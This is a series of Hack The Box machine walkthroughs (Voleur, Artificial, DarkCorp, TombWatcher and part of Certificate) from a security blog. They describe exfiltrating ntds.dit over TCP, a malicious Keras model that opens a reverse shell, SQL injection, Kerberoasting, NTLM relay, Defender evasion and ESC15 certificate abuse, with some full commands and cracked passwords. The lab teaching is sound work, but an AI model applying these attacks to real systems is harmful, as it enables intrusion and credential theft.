Downloaded two files from the share: the private SSH key id_rsa and the text file Note.txt.txt β treat id_rsa as a sensitive private key (check for a passphrase) and review Note.txt.txt for useful creds or instructions.
The note indicates that the administrator was dissatisfied with Windows Backup and has started configuring Windows Subsystem for Linux (WSL) to experiment with Linux-based backup tools. They are asking Jeremy to review the setup and implement or configure any viable backup solutions using the Linux environment. Essentially, itβs guidance to transition or supplement backup tasks from native Windows tools to Linux-based tools via WSL.
The key belongs to the svc_backup user, and based on the earlier port scan, port 2222 is open, which can be used to attempt a connection.
The only difference in this case is the presence of the backups directory.
There are two directories present: Active Directory and Registry.
Stream the raw contents of the ntds.dit file to a remote host by writing it out over a TCP connection.
The ntds.dit file was transferred to the remote host.
Stream the raw contents of the SYSTEM file to a remote host by writing it out over a TCP connection.
The SYSTEM file was transferred to the remote host.
That command runs impacket-secretsdump in offline mode against the dumped AD database and system hive β reading ntds.dit and SYSTEM to extract domain credentials and secrets (user NTLM hashes, cached credentials, machine account hashes, LSA secrets, etc.) for further offline analysis; treat the output as highly sensitive and use only with proper authorization.
Acquire an Administrator service ticket for WinRM access.
Authenticate with kinit using the cracked password, then run evil-winrm to access the target.
To retrieve the root flag, run type root.txt in the compromised session.
The post Hack The Box: Voleur Machinen Walkthrough β Medium Difficulty appeared first on Threatninja.net.
In this writeup, we will explore the βArtificialβ machine from Hack The Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βArtificialβ machine from Hack The Box by achieving the following objectives:
User Flag:
The user flag is obtained by scanning the βArtificialβ machine, identifying a web server on port 80, and creating an account to access its dashboard. The dashboard allows uploading .h5 files, so a malicious .h5 file is crafted to trigger a reverse shell. After setting up a Docker environment and uploading the file, a shell is gained as the app user. A SQLite database (users.db) is found, and cracking its password hashes reveals credentials for the user gael. Logging in via SSH as gael allows retrieval of the user flag from user.txt.
Root Flag:
To escalate to root, a scan reveals port 9898 running Backrest. Forwarding this port and enumerating the service uncovers backup files and a config.json with a bcrypt-hashed password. Decoding a base64 value yields a plaintext password, granting access to a Backrest dashboard. Exploiting the RESTIC_PASSWORD_COMMAND feature in the dashboard triggers a root shell, allowing the root flag to be read from root.txt.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.74Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/artificial]
ββββΌ $nmap -sC -sV -oA initial 10.10.11.74
# Nmap 7.94SVN scan initiated Mon Oct 20 10:13:11 2025 as: nmap -sC -sV -oA initial 10.10.11.74
Nmap scan report for 10.10.11.74
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
| 256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_ 256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 20 10:13:51 2025 -- 1 IP address (1 host up) scanned in 39.96 secondsAnalysis:
At this stage, the target appears to host a standard website with no immediately visible anomalies or interactive elements.
I actively created a new user account to interact with the application and test its features.
Using the credentials created earlier, I logged into the application.
Finally, access to the dashboard was successfully obtained as shown above.
At this point, the application requires a file to be uploaded.
Two links appear interesting to explore: requirements and Dockerfile.
The main dashboard endpoint returned a response with status 200 OK.
Further analysis of the response revealed that the upload functionality only accepts files in the .h5 format.
As the dashboard response showed nothing significant, I focused on analyzing the previously downloaded file.
The requirements.txt specifies tensorflow-cpu==2.13.1, indicating that the applicationβs dependencies rely on this TensorFlow version. Attempting to install it outside of a TensorFlow-compatible environment will result in errors.
The Dockerfile creates a Python 3.8 slim environment, sets the working directory to /code, and installs curl. It then downloads the TensorFlow CPU wheel (tensorflow_cpu-2.13.1) and installs it via pip. Finally, it sets the container to start with /bin/bash. This ensures that the environment has TensorFlow pre-installed, which is required to run the application or handle .h5 files.
While trying to install the requirements, I faced an error stating they need a TensorFlow environment.
I could install TensorFlow locally, but its large file size causes issues. Even after freeing up disk space, the installation fails due to insufficient storage.
The script constructs and saves a Keras model incorporating a malicious Lambda layer: upon loading the model or executing the layer, it triggers an os.system command to establish a named pipe and launch a reverse shell to 10.10.14.105:9007. Essentially, the .h5 file serves as an RCE payloadβavoid loading it on any trusted system; examine it solely in an isolated, disposable environment (or through static inspection) and handle it as potentially harmful.
Proceed within an isolated Python virtual environment (venv) to analyze the file; perform static inspection only and avoid importing or executing the model.
Installing TensorFlow remains necessary.
Following careful thought, I selected a Docker environment to execute the setup, seeking to bypass local dependency or storage problems.
I built and tagged the Docker image successfully.
At this stage, the Docker environment is running without any issues.
The command updates the package lists and installs the OpenBSD version of Netcat (netcat-openbsd) to enable network connections for testing or reverse shells.
netcat-openbsd is a lightweight, versatile networking utility commonly used in HTB and pentests to create raw TCP/UDP connections, transfer files, and receive reverse shells. The OpenBSD build omits the risky -e/βexec option present in some older variants, but it still pipes stdin/stdout over sockets, so only use it in authorised, isolated lab environments (examples: nc -l -p PORT to listen, nc HOST PORT to connect) .
Ultimately, I executed the script successfully, achieving the expected outcomeβa reverse shell to 10.10.14.105:9007βas demonstrated above.
Consequently, I generated an .h5 model file.
I launched a netcat listener on 10.10.14.105:9007 to receive the incoming reverse shell.
I uploaded the exploit.h5 file to the applicationβs file upload endpoint to initiate model processing.
Successfully uploading the file and clicking the View Predictions button activates the embedded payload.
Page displayed a loading state, indicating that the payload is likely executing.
The shell connection successfully linked back to my machine.
Upgrading the reverse shell to a fully interactive session simplified command execution.
Gained an interactive shell as the application user app.
Found a Python file named app.py in the application directory.
The app.py section reveals a hard-coded Flask secret key, Sup3rS3cr3tKey4rtIfici4L, sets up SQLAlchemy to utilize a local SQLite database at users.db, and designates the models directory for uploads. The fixed key allows session manipulation or cookie crafting, the SQLite file serves as a simple target for obtaining credentials or tokens, and the specified upload path indicates where malicious model files are kept and can be executedβcollectively offering substantial opportunities for post-exploitation and privilege escalation.
Located a users.db file that appears to be the applicationβs SQLite database; it likely contains user records, password hashes, and session data, making it a prime target for credential extraction and privilege escalation.
Downloaded users.db to our own machine using netcat for offline analysis.
Verification confirms users.db is a SQLite 3.x database.
Extracted password hashes from the users.db (SQLite3) for offline cracking and analysis.
Apart from the test account, I extracted password hashes from the remaining user accounts in the SQLite database for offline cracking and analysis.
Configured hashcat to the appropriate hash mode for the extracted hash type, then launched the cracking job against the dump.
Cracking the hashes revealed two plaintext passwords, but the absence of corresponding usernames in the dataset blocked immediate account takeover.
An easier verification is to use nc β we accessed the user gael with the password mattp005numbertwo.
Authenticated to the target via SSH as user gael using the recovered password, yielding an interactive shell.
The user flag was read by running cat user.txt.
Privilege Escalation:
Artificial host lacks a sudo binary, preventing sudo-based privilege escalation.
Port scan revealed 9898/tcp open β likely a custom service or web interface; enumerate it further with banner grabs, curl, or netcat.
Established a port-forward from the targetβs port 9898 to a local port to interact with the service for further enumeration.
Exploring the forwarded port 9898 revealed Backrest version 1.7.2 as the running service.
Attempting to authenticate to Backrest with gaelβs credentials failed.
Enumerated the Backrest service and discovered several files within its accessible directories.
Enumeration of the Backrest instance revealed several accessible directories, each containing files that warrant further inspection for credentials, configuration data, or backup artefacts.
The install.sh file contains configuration settings that appear standard at first glance, with no immediately suspicious entries.
However, scrolling further reveals sections resembling backup configuration, suggesting the script may handle sensitive data or database dumps.
Focused on locating backup files referenced in the configuration for potentially sensitive data.
Discovering multiple backup files revealed a substantial amount of stored data potentially containing sensitive information.
Copying the backup file to /tmp enabled local inspection and extraction.
Successfully copying the backup file made it available in /tmp for analysis.
Unzipping the backup file in /tmp allowed access to its contents for further inspection.
Several files contained the keyword βpassword,β but the config.json file appeared unusual or suspicious upon inspection.
Discovered a potential username and a bcrypt-hashed password. Because bcrypt uses salting and is intentionally slow, offline cracking requires a tool like hashcat or John that supports bcrypt, paired with wordlists/rules and significant computational resources; alternatively, explore safe credential reuse checks on low-risk services or conduct password spraying in a controlled lab setting.
Decoding a base64-encoded value uncovered the underlying data.
Recovered the plaintext password after decoding the base64-encoded value.
Credentials recovered earlier were submitted to the service to attempt authentication.
A different dashboard was successfully accessed using the recovered credentials.
To create a new Restic repository, you first need to initialise a storage location where all encrypted backups will be kept
While adding the Restic repository via environment variables, I noticed that RESTIC_PASSWORD is required. I also discovered an interesting variable, RESTIC_PASSWORD_COMMAND, which can execute a command to retrieve the password.
RESTIC_PASSWORD_COMMAND?RESTIC_PASSWORD_COMMAND tells restic to run the given command and use its stdout as the repository password. Itβs convenient for integrating with secret stores or helper scripts, but itβs dangerous if an attacker can control that environment variable or the command it points to.
The shell can be triggered by selecting βTest Configurationβ.
The root flag can be accessed by running cat root.txt.
The post Hack The Box: Artificial Machine Walkthrough β Easy Diffucilty appeared first on Threatninja.net.
In this writeup, we will explore the βDarkCorpβ machine from Hack The Box, categorized as an Insane difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βDarkCorpβ machine from Hack The Box by achieving the following objectives:
User Flag:
Gained initial foothold via the webmail/contact vector, registered an account, abused the contact form, and executed a payload to spawn a reverse shell. From the shell, read user.txt to capture the user flag.
Root Flag:
Performed post-exploitation and credential harvesting (SQLi β hashes β cracked password thePlague61780, DPAPI master key recovery and Pack_beneath_Solid9! recovered), used recovered credentials and privilege escalation techniques to obtain root, then read root.txt to capture the root flag.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.54Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/darkcorp]
ββββΌ $nmap -sC -sV -oA initial 10.10.11.54
# Nmap 7.94SVN scan initiated Sun Aug 17 03:07:38 2025 as: nmap -sC -sV -oA initial 10.10.11.54
Nmap scan report for 10.10.11.54
Host is up (0.18s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
|_ 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 17 03:08:04 2025 -- 1 IP address (1 host up) scanned in 25.73 seconds
ββ[dark@parrot]β[~/Documents/htb/darkcorp]
ββββΌ $
Analysis:
Nothing noteworthy was found on the website itself.
A subdomain was discovered that leads to the DripMail Webmail interface.
As a next step, proceed to register a new account.
Enter the required information to create the new account.
We successfully created the account, confirming that the DripMail Webmail portalβs registration process works correctly. This indicates that user registration is open; therefore, we can interact with the mail system. Consequently, this may enable further exploration, including login, email sending, and service enumeration.
A new email appeared in the inbox from no-reply@drip.htb, indicating that the system had sent an automated message; moreover, it may contain a verification notice, onboarding information, or credential-related details, all of which are worth reviewing for further clues.
However, it turned out to be just a welcome email from no-reply@drip.htb, providing no useful information.
The site includes a contact form that attackers could potentially exploit.
We entered a non-deterministic key value into the input.
We sent the message successfully, confirming that the contact form works and accepts submissions.
Burp shows the contact form submission (POST) carrying the random key and payload, followed by a successful response.
We modified the contact-form recipient field and replayed the POST via Burp Repeater; the server returned 200 OK, and it delivered the message to admin@drip.htb.
We received a request for customer information.
Letβs start our listener
Insert the base64-encoded string into the message.
The Burp Suite trace looks like the following.
A staff member sent an email.
We need to change the password.
After setting the payload, we received a password reset link.
Letβs change the password as needed
We are provide with a dashboard
We accessed the user overview and discovered useful information.
The application is vulnerable to SQL injection.
The input is an SQL injection payload that closes the current query and injects a new one: it terminates the original statement, runs
SELECT table_name FROM information_schema.tables WHERE table_schema=βpublicβ;
and uses β to comment out the remainder. This enumerates all table names in the public schema; the response (Users, Admins) shows the database exposed those table names, confirming successful SQLi and information disclosure.
The payload closes the current query and injects a new one:
SELECT column_name FROM information_schema.columns WHERE table_name=βUsersβ;β
which lists all column names for the Users table. The response (id, username, password, email, host_header, ip_address) confirms successful SQLi-driven schema enumeration and reveals sensitive columns (notably password and email) that could enable credential or user-data disclosure.
Obtained password hashes from the Users table (Users.password). These values are opaque; we should determine their type, attempt to crack only with authorisation, and protect them securely.
The SQL command SELECT pg_ls_dir('./'); invokes PostgreSQLβs pg_ls_dir() function to list all files and directories in the server processβs current directory (typically the database data or working directory). Because pg_ls_dir() exposes the filesystem view, it can reveal configuration files or other server-side files accessible to the database process β which is why itβs often used during postβexploitation or SQLi-driven reconnaissance. Importantly, this function requires superuser privileges; therefore, a nonβsuperuser connection will be denied. Consequently, successful execution implies that the user has elevated database permissions.
The SQL command SELECT pg_read_file('PG_VERSION', 0, 200); calls PostgreSQLβs pg_read_file() to read up to 200 bytes starting at offset 0 from the file PG_VERSION on the database server. PG_VERSION normally contains the PostgreSQL version string, so a successful call discloses the DB version to the attacker β useful for fingerprinting β and typically requires superuser privileges, making its successful execution an indicator of elevated database access and a potential informationβdisclosure risk.
Returning down the path, I spotted one; it would impress those who have beaten Cerberusβ¦/../../ssssss
SSSD maintains its own local ticket credential caching mechanism (KCM), managed by the SSSD process. It stores a copy of the valid credential cache, while the corresponding encryption key is stored separately in /var/lib/sss/secrets/secrets.ldb and /var/lib/sss/secrets/.secrets.mkey.
Finally, we successfully received a reverse shell connection back to our machine; therefore, this confirmed that the payload executed correctly and established remote access as intended.
Nothing of significance was detected.
Discovered the database username and password.
Elevate the current shell to an interactive TTY.
The encrypted PostgreSQL backup dev-dripmail.old.sql.gpg is decrypted using the provided passphrase, and the resulting SQL dump is saved as dev-dripmail.old.sql. Consequently, this allows further inspection or restoration of the database for deeper analysis or recovery.
The output resembles what is shown above.
Found three hashes that can be cracked with Hashcat.
We successfully recovered the password thePlague61780.
Since Hashcat managed to crack only one hash, weβll therefore use CrackStation to attempt cracking the remaining two.
Update the configuration file.
Established an SSH session to the machine as ebelforrd.
No binary found
Found two IP addresses and several subdomains on the target machine.
Update the subdomain entries in our /etc/hosts file.
sshuttle and dnschef
Use sshuttle to connect to the server and route traffic (like a VPN / port forwarding).
Additionally, dnschef was used to intercept and spoof DNS traffic during testing.
Log in using the victor.r account credentials.
Click the check button to get a response
Replace the saved victor.r login details in Burp Suite.
Testing the suspected host and port for reachability.
Begin the NTLM relay/replay attack.
Leverage socatx64 to perform this activity.
An LDAP interactive shell session is now running.
Run get_user_groups on svc_acc to list their groups.
Retrieved the SID associated with this action.
Retrieved the administrator.ccache Kerberos ticket.
We can read the user flag by typing βtype user.txtβ command
Privilege Escalation:
Transfer sharpdpapi.exe to the target host.
Attempting to evade Windows Defender in a sanctioned test environment
The output reveals a DPAPI-protected credential blob located atC:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E. It references a master key with GUID {6037d071-...} and shows that the blob is protected using system-level DPAPI (CRYPTPROTECT_SYSTEM), with SHA-512 for hashing and AES-256 for encryption. Since the message indicates MasterKey GUID not in cache, the decryption cannot proceed until the corresponding master key is obtained β either from the userβs masterkey file or by accessing a process currently holding it in memory.
This output shows a DPAPI local credential file at C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ with the filename 32B2774DF751FF7E28E78AE75C237A1E. The system protects it using a DPAPI master key (GUID {6037d071-cac5-481e-9e08-c4296c0a7ff7}), applies SHA-512 for hashing, and uses AES-256 for encryption. Because the master key isnβt currently in the cache, we canβt decrypt the credential blob until we obtain that master key (for example from the masterkey file) or access the process that holds it in memory.
Direct file transfer through evil-winrm was unsuccessful.
Transform the file into base64 format.
We successfully recovered the decrypted key; as noted above, this confirms the prior output and therefore enables further analysis.
Successfully recovered the password Pack_beneath_Solid9!
Retrieval of angela.wβs NT hash failed.
Attempt to gain access to the angela.w account via a different method.
Acquired the hash dump for angela.w.
Save the ticket as angela.w.adm.ccache.
Successful privilege escalation to root.
Retrieved password hashes.
Password reset completed and new password obtained.
Enumerated several GPOs in the darkcorp.htb domain; additionally, each entry shows the GPO GUID, display name, SYSVOL path, applied extension GUIDs, version, and the policy areas it controls (registry, EFS policy/recovery, Windows Firewall, security/audit, restricted groups, scheduled tasks). Furthermore, the Default Domain Policy and Default Domain Controllers Policy enforce core domain and DC security β notably, the DC policy has many revisions. Meanwhile, the SecurityUpdates GPO appears to manage scheduled tasks and update enforcement. Therefore, map these SYSVOL files to find promising escalation vectors: for example, check for misconfigured scheduled tasks, review EFS recovery settings for exposed keys, and identify privileged group memberships. Also, correlate GPO versions and recent changes to prioritize likely targets.
BloodHound identifies taylor as GPO manager β pyGPOAbuse is applicable, pending discovery of the GPO ID.
Force a Group Policy update using gpupdate /force.
Display the root flag with type root.txt.
The post Hack The Box: DarkCorp Machine Walkthrough β Insane Difficulity appeared first on Threatninja.net.
In this write-up, we will explore the βTombWatcherβ machine from HackTheBox, categorised as a Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Like real-world Windows engagements, start TombWatcher using the henry account with password H3nry_987TGV!.
The goal of this walkthrough is to complete the βTombwatcherβ machine from Hack The Box by achieving the following objectives:
Using Kerberos and AD enumeration, the team cracked a TGS hash (Alfred β password: basketballl) and escalated access through account takeover and BloodHound-guided actions until they obtained valid interactive credentials for a machine user (john). With Johnβs credentials they authenticated to the host and retrieved the user flag by running type user.txt.
We exploited a misconfigured certificate template (ESC15) with Certipy to request a certificate for the Administrator UPN, obtained a TGT (saved in administrator.ccache), and extracted the Administrator NT hash. Using those Administrator credentials, they logged into the DC/host and read the root flag with type root.txt.
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.72Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/tombwatcher]
ββββΌ $nmap -sC -sV -oA initial 10.10.11.72
# Nmap 7.94SVN scan initiated Thu Oct 9 23:26:58 2025 as: nmap -sC -sV -oA initial 10.10.11.72
Nmap scan report for 10.10.11.72
Host is up (0.23s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-10 02:11:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-09T17:02:50
|_Not valid after: 2026-10-09T17:02:50
|_ssl-date: 2025-10-10T02:13:32+00:00; -1h15m15s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-10T02:13:31+00:00; -1h15m16s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-09T17:02:50
|_Not valid after: 2026-10-09T17:02:50445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-10T02:13:31+00:00; -1h15m16s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-09T17:02:50
|_Not valid after: 2026-10-09T17:02:50
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-10T02:13:32+00:00; -1h15m16s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-09T17:02:50
|_Not valid after: 2026-10-09T17:02:50
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-10T02:13:31+00:00; -1h15m16s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2025-10-09T17:02:50
|_Not valid after: 2026-10-09T17:02:50
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h15m16s, deviation: 1s, median: -1h15m16s
| smb2-time:
| date: 2025-10-10T02:12:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Analysis:
The website lacks engaging content, featuring only an IIS interface.
Authentication is performed with the username βHenryβ and password βH3nry_987TGV!β, using the nameserver at IP 10.10.11.72 for DNS resolution. All AD elements, such as groups, sessions, trusts, and ACLs (excluding real-time logged-on users), are gathered with the β-c Allβ flag, and the JSON output is packaged into a compressed ZIP archive via the ββzipβ flag for import into the BloodHound GUI to visualize attack paths.
Henry added an SPN to Alfredβs account, which lets attackers request a service ticket for that SPN and perform Kerberoasting to crack Alfredβs password; since Henry could write the SPN, this is a direct takeover pathβenumerate SPNs, request the TGS, and crack it offline.
Attempted to use GetUserSPN, but no entries were found!
Unfortunately, no results were obtained when using targeted Kerberos enumeration.
The provided string is a Kerberos TGS (Ticket Granting Service) hash in the $krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred* format, associated with the user βAlfredβ in the βtombwatcher.htbβ domain, likely obtained after successful clock synchronisation using ntpdate. This hash, commonly used in penetration testing scenarios like Hack The Box, can be cracked using tools like Hashcat to reveal Alfredβs credentials, enabling further privilege escalation or lateral movement within the domain. The hash includes encrypted ticket data, which can be analyzed to exploit vulnerabilities in the Kerberos authentication system.
We successfully cracked the Kerberos hash and obtained the password βbasketballlβ for the user Alfred on the domain.
We should collect additional information using BloodHound-python
Infrastructure has ReadGMSAPassword on ansible_dev, which lets an attacker retrieve the gMSA password material for that account.
We attempted to use the GMSDumper script to retrieve the NTLM hash, but only infrastructure-related data was obtained.
Letβs add Alfred to the infrastructure group to proceed.
Finally, we obtained the NTLM hash for the user ansible_dev$.
Consequently, the attack successfully changed the password to gain SAM access.
We encountered a timeout error while trying to collect data with BloodHound.py.
We successfully resolved the issue by updating the clock skew.
Forcibly changed the ansible_dev account password to sam, giving immediate authentication capability as ansible_dev; this lets you log in as that service account (or use its credentials on hosts that accept it) to pivot, access service resources, or escalate furtherβnext, validate access and hunt hosts using ansible_dev.
Using bloodyAD with the command bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u sam -p 'Passw@rd' set owner john sam, we successfully replaced the old owner of the βjohnβ object with βsamβ in the tombwatcher.htb domain.
The command bloodyAD --host 10.10.11.72 -d "tombwatcher.htb" -u "sam" -p 'Passw@rd' add genericAll "john" "sam" successfully granted βsamβ GenericAll permissions on the βjohnβ object in the tombwatcher.htb domain.
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u 'sam' -p 'Passw@rd' add shadowCredentials john effectively added Shadow Credentials to the βjohnβ object in the tombwatcher.htb domain, enabling potential Kerberos-based attacks like certificate-based authentication exploitation.
Set the environment variable KRB5CCNAME to john_E8.ccache with the command export KRB5CCNAME=john_E8.ccache to designate the Kerberos credential cache file for authentication operations involving the user βjohnβ in the tombwatcher.htb domain.
Attempting to retrieve the NT hash with getnthash resulted in failure.
Efforts to use bloodyAD to obtain the βSAMβ object were unsuccessful.
The UserAccountControl settings indicate a standard account with a non-expiring password.
Issuing python3 owneredit.py -action write -target βjohnβ -new-owner βsamβ βtombwatcher.htb/samβ:βAbc123456@β -dc-ip 10.10.11.72 actively changed the owner of the βjohnβ object to βsamβ in the tombwatcher.htb domain, targeting the domain controller at IP 10.10.11.72 with the provided credentials, and successfully updated the OwnerSID.
Ultimately, we successfully updated the password for the βjohnβ account in the tombwatcher.htb domain.
We successfully gained access to the machine using Johnβs credentials in the tombwatcher.htb domain.
Executing the command type user.txt allows viewing the user flag on the compromised machine in the tombwatcher.htb domain.
Privilege Escalation:
Running Get-ADObject -Filter {SamAccountName -eq 'cert_admin'} -IncludeDeletedObjects retrieves the Active Directory object for the βcert_adminβ account, including any deleted objects, in the tombwatcher.htb domain.
Attempting to restore all objects using their ObjectGUID in the tombwatcher.htb domain.
Running Enable-ADAccount -Identity cert_admin reactivates the βcert_adminβ account in the tombwatcher.htb domain, allowing its use within Active Directory.
Issuing Set-ADAccountPassword -Identity cert_admin -Reset -NewPassword (ConvertTo-SecureString "Abc123456@" -AsPlainText -Force) resets the password for the βcert_adminβ account to βAbc123456@β in the tombwatcher.htb domain, securely applying the change.
Launching certipy find -u cert_admin -p 'Abc123456@' -dc-ip 10.10.11.72 -vulnerable scans for vulnerable certificate templates in the tombwatcher.htb domain using the βcert_adminβ account credentials, targeting the domain controller at IP 10.10.11.72.
Attackers identified the ESC15 vulnerability in the target domain, revealing a misconfiguration in certificate templates that enables unauthorized privilege escalation.
ESC15 is an Active Directory PKI attack where attackers abuse overly permissive certificate templates to obtain certificates for highβprivilege accounts (e.g., Administrator). By enrolling or abusing a template that allows nonβadmin principals to request certificates or act as Certificate Request Agents, an attacker can request a certificate embedding a target UPN/SID, use it for PKINIT/CertAuth to get a TGT, and then escalate to domain compromise.
Issuing certipy req -u 'cert_admin@tombwatcher.htb' -p 'Abc123456@' -dc-ip '10.10.11.72' -target 'DC01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'administrator@tombwatcher.htb' -application-policies 'Client Authentication' requests a certificate in the tombwatcher.htb domain using the βcert_adminβ account, targeting the domain controller DC01 at IP 10.10.11.72, leveraging the βWebServerβ template from the βtombwatcher-CA-1β authority with the UPN βadministrator@tombwatcher.htbβ for client authentication purposes.
In the updated system, an error occurs when examining the signature algorithm, indicating CA_MD_TOO_WEAK.
Running openssl pkcs12 -in administrator.pfx -clcerts -nokeys | openssl x509 -text -noout extracts and displays the certificate details from the administrator.pfx file in a human-readable format, excluding private keys.
The certificate uses the SHA1withRSAEncryption signature algorithm, as revealed by analyzing the administrator.pfx file in the tombwatcher.htb domain.
Issuing certipy req -u βcert_admin@tombwatcher.htbβ -p βP@ssw0rdβ -dc-ip β10.10.11.72β -target βDC01.tombwatcher.htbβ -ca βtombwatcher-CA-1β -template βWebServerβ -application-policies βCertificate Request Agentβ requests a certificate from a V1 template in the tombwatcher.htb domain, using the βcert_adminβ account, targeting the domain controller DC01 at IP 10.10.11.72, via the βtombwatcher-CA-1β authority with the βWebServerβ template, and injecting the βCertificate Request Agentβ application policy.
Leverage the Certipy to request a certificate in the tombwatcher.htb domain. It uses the βcert_adminβ account with password βAbc123456@β to authenticate, targeting the domain controller βDC01.tombwatcher.htbβ at IP 10.10.11.72. The request, made through the βtombwatcher-CA-1β certificate authority with the βUserβ template, utilizes the βcert_admin.pfxβ file (likely holding a Certificate Request Agent certificate) to request a certificate on behalf of the βtombwatcher\Administratorβ account. This exploits the ESC15 vulnerability, where a misconfigured certificate template allows βcert_adminβ to impersonate the Administrator, potentially enabling elevated privileges via Kerberos authentication or other attack vectors.
It embedded with the Administratorβs UPN (βAdministrator@tombwatcher.htbβ) and SID (βS-1-5-21-1392491010-1358638721-2126982587-500β), enabling Certipy to obtain a Kerberos Ticket Granting Ticket (TGT) for the Administrator account. Certipy stores the TGT in administrator.ccache and extracts the NT hash for administrator@tombwatcher.htb ,allowing privilege escalation or full administrative access within the tombwatcher.htb domain.
Successfully gained access to the tombwatcher.htb domain using the extracted NT hash for βadministrator@tombwatcher.htbβ
Issuing the command type root.txt allows reading the root flag on the compromised machine in the tombwatcher.htb domain, confirming administrative access.
The post Hack The Box: Tombwatcher Machine Walkthrough β Medium Difficulty appeared first on Threatninja.net.
In this write-up, we will explore the βCertificateβ machine from Hack The Box, categorized as a Hard difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βCertificateβ machine from Hack The Box by achieving the following objectives:
User Flag:
We found a login account (lion.sk) by analyzing network traffic and files, then cracked a captured password hash to get the password. Using that password we remotely logged into the machine as lion.sk and opened the desktop to read the user.txt file, which contained the user flag.
Root Flag:
